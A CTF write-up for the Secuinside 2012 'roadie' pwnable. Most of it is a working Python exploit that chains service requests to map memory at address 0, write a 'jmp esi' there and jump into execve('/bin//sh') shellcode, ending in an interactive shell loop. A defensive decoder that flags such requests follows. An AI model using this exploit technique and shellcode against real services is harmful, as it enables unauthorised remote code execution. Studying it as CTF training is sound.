Secuinside 2012 Quals - Roadie (Exploit only)

2012. 10. 7. 01:37 · CTF

Category : Pwnables
nickname: roadie

HINT: 61.42.25.26:8080
(8181,8282,8383,8484,8585,8686,8787,8888,8989)

binary: http://61.42.25.26/roadie

CentOS 6.2 / randomize_va_space 2 / exec-shield 1

Summary : chain the service's functions: allocate memory at address 0 -> write byte code at address 0 -> call address 0

#!/usr/bin/env python3
# Ported from the original Python 2 script: byte strings, integer division and
# input()/print() adjusted. d() now masks to 32 bits so that values such as
# 0xffffffff, 0xcccccccc and -1 all pack without a struct.error.

from socket import socket, AF_INET, SOCK_STREAM
from struct import pack


def d(x):
    # 32-bit little-endian word; the mask lets negative and >0x7fffffff values pack alike
    return pack('<I', x & 0xffffffff)


def w(x):
    return pack('<h', x)


def b(x):
    return pack('<b', x)


HOST = "127.0.0.1"
PORT = 8383

# three NOPs followed by execve("/bin//sh") shellcode
SHELLCODE = b"\x90\x90\x90\x31\xc0\x50\x68\x2f\x2f\x73\x68\x68\x2f\x62\x69\x6e\x89\xe3\x50\x53\x89\xe1\x31\xd2\xb0\x0b\xcd\x80"


############################### CASE call  #############################
def gen_call(idx, addr):
    pSize = 0x244
    pList = [d(0) for i in range(pSize // 4)]   # 0x244-byte request, all zero

    pList[0] = b(-1) + b(66) + b(66) + b(79)
    pList[2] = d(0)
    pList[3] = d(0x00007feb)      # "\xeb\x7f" = jmp $ + 0x7f
    pList[4] = d(0x02000200)
    pList[5] = d(0x00000100)
    pList[6] = d(0x00000100)
    pList[7] = d(0x1234001f)
    pList[8] = d(0)
    pList[9] = d(-1)
    pList[10] = d(3)
    pList[11] = d(-12)
    pList[12] = d(0)
    pList[13] = d(-14)
    pList[14] = d(0x01090120)
    pList[15] = d(0)
    pList[16] = d(0x123)
    pList[17] = d(0)
    pList[18] = d(-1)
    pList[19] = d(0x00000101)
    pList[20] = d(8)
    pList[21] = d(8)
    pList[22] = d(-1)
    pList[23] = d(0xffff)
    pList[24] = d(0xffff0000)
    pList[25] = d(0x00b100a1)
    pList[26] = d(0x000000c1)
    pList[27] = d(0x000000d1)
    pList[28] = d(addr)           # function addr
    pList[29] = d(0)
    pList[31] = d(0xcccccccc)
    pList[32] = d(0xdddddddd)
    pList[33] = d(0x0)
    pList[34] = d(idx + 1)        # index of loop

    return b"".join(pList)
#############################################################################


############################### CASE mmap ###################################
def gen_mmap(idx, idx2, value):
    pSize = 0x244
    pList = [d(0) for i in range(pSize // 4)]   # 0x244-byte request, all zero

    pList[0] = b(-1) + b(66) + b(66) + b(79)
    pList[2] = d(0x00000000)
    pList[3] = d(1234)
    pList[4] = d(0x02000200)
    pList[5] = d(0x00000100)
    pList[6] = d(0x00000100)
    pList[7] = d(0x1234001e)
    pList[8] = d(0)
    pList[9] = d(-1)
    pList[10] = d(3)
    pList[11] = d(-12)
    pList[12] = d(0)
    pList[13] = d(-14)
    pList[14] = d(0x01090120)
    pList[15] = d(0)
    pList[16] = d(0x123)
    pList[17] = d(-4)
    pList[18] = d(0)
    pList[19] = d(0xffffffff)
    pList[20] = d(idx2)           # index of new buffer to overwrite
    pList[21] = d(0)
    pList[22] = d(0x01)
    pList[23] = d(0x02)
    pList[24] = d(0x03)
    pList[25] = d(0x04)
    pList[26] = d(0x05)
    pList[27] = d(0x06)
    pList[28] = d(0x07)
    pList[29] = d(0x08)
    pList[30] = d(value)          # we can write this value

    pList[39] = d(0x33)

    pList[72] = d(-40)
    pList[73] = d(-24)
    pList[74] = d(-23)
    pList[75] = d(3)
    pList[76] = d(0)
    pList[77] = d(0)
    pList[78] = d(-126)

    pList[86] = d(idx + 1)        # index of loop

    return b"".join(pList)
#############################################################################


####################### Main Procedure ####################################
s = socket(AF_INET, SOCK_STREAM)
s.connect((HOST, PORT))

input("gogo?> ")

values = [0xff, 0xe6]            # jmp esi

# requests 0 and 1: write the two bytes of "jmp esi" at offsets 0 and 1 of the buffer at address 0
for i in range(0, 2):
    s.send(gen_mmap(i, i, values[i]))

# request 2: call address 0; the tail of this request holds the NOP sled + shellcode that esi points at
s.send(gen_call(2, 0x0)[:35 * 4] + b"\x90" * (0x244 - 35 * 4 - len(SHELLCODE)) + SHELLCODE)

############################# Got SHELL ######################################
while 1:
    cmd = input("$ ")
    s.send(cmd.encode() + b"\n")
    if cmd == "exit":
        break
    print(s.recv(1024).decode(errors="replace"))
##############################################################################

s.close()
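Both request types in the script share one fixed 0x244-byte layout, and the chain hinges on a handful of words in it: the opcode word (field 7, 0x1234001f for the call case and 0x1234001e for the mmap case), the call target (field 28), the write offset (field 20) and the written byte (field 30). The decoder below is an added example, not part of the original writeup and not code from the challenge: it pulls those fields out of a captured request and flags the two things a monitor for this service would care about, a call whose target lies in page zero and a write into the buffer that the summary says is mapped at address 0. The field names, and the reading of field 20 as a byte offset within that buffer, are assumptions inferred from the script's comments rather than documented protocol; the sample packets are constructed inline.

```python
import struct

PKT_SIZE = 0x244                 # request length both generators in the script use
MAGIC = b"\xff" + b"BBO"         # field 0 as the script builds it: b(-1) b(66) b(66) b(79)
OP_CALL = 0x1234001F             # field 7 in gen_call
OP_MMAP = 0x1234001E             # field 7 in gen_mmap
ZERO_PAGE_LIMIT = 0x1000         # anything below this counts as "page zero" for this check

# Word indices (32-bit little-endian) taken from the pList positions in the script.
# The names are inferred from the script's comments, not from protocol documentation.
F_OPCODE, F_WRITE_OFF, F_CALL_ADDR, F_WRITE_VAL = 7, 20, 28, 30
F_TAIL = 35                      # from here on gen_call's payload is replaced by sled + shellcode


def field(pkt, i):
    """Return 32-bit little-endian word number i of a request."""
    return struct.unpack_from("<I", pkt, i * 4)[0]


def inspect_request(pkt):
    """Decode one fixed-layout request and list why it looks like the roadie chain.

    Returns {"opcode": <name or None>, "findings": [...]}; an empty findings
    list means nothing in the request touches page zero.
    """
    if len(pkt) != PKT_SIZE or pkt[:4] != MAGIC:
        return {"opcode": None, "findings": ["not a well-formed request"]}
    op = field(pkt, F_OPCODE)
    findings = []
    if op == OP_CALL:
        kind = "call"
        target = field(pkt, F_CALL_ADDR)
        if target < ZERO_PAGE_LIMIT:
            findings.append("call target 0x%08x lies in page zero" % target)
        if b"\x90" * 16 in pkt[F_TAIL * 4:]:
            findings.append("trailing bytes carry a NOP sled")
    elif op == OP_MMAP:
        kind = "mmap"
        off = field(pkt, F_WRITE_OFF)
        val = field(pkt, F_WRITE_VAL) & 0xFF
        # assumption: `off` is the byte offset inside the buffer mapped at address 0
        if off < ZERO_PAGE_LIMIT:
            findings.append("writes byte 0x%02x at page-zero offset %d" % (val, off))
    else:
        kind = "unknown(0x%08x)" % op
    return {"opcode": kind, "findings": findings}


def build_sample(op, fields=None):
    """Constructed test input: a request with the magic, the opcode and the given
    {word_index: value} fields set, everything else zero (not a real capture)."""
    words = [0] * (PKT_SIZE // 4)
    words[F_OPCODE] = op
    for idx, val in (fields or {}).items():
        words[idx] = val & 0xFFFFFFFF
    return MAGIC + b"".join(struct.pack("<I", v) for v in words[1:])


if __name__ == "__main__":
    # constructed samples: the two shapes the exploit sends, plus a benign call
    for name, pkt in [
        ("mmap write", build_sample(OP_MMAP, {F_WRITE_OFF: 1, F_WRITE_VAL: 0xE6})),
        ("call to 0", build_sample(OP_CALL, {F_CALL_ADDR: 0})),
        ("benign call", build_sample(OP_CALL, {F_CALL_ADDR: 0x08048000})),
    ]:
        print(name, inspect_request(pkt))
```

The threshold of 0x1000 mirrors the lowest value of vm.mmap_min_addr a hardened host would run with; on a box where the page-zero mapping in the summary is possible at all, a request that directs a call below that limit has no legitimate reason to exist.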















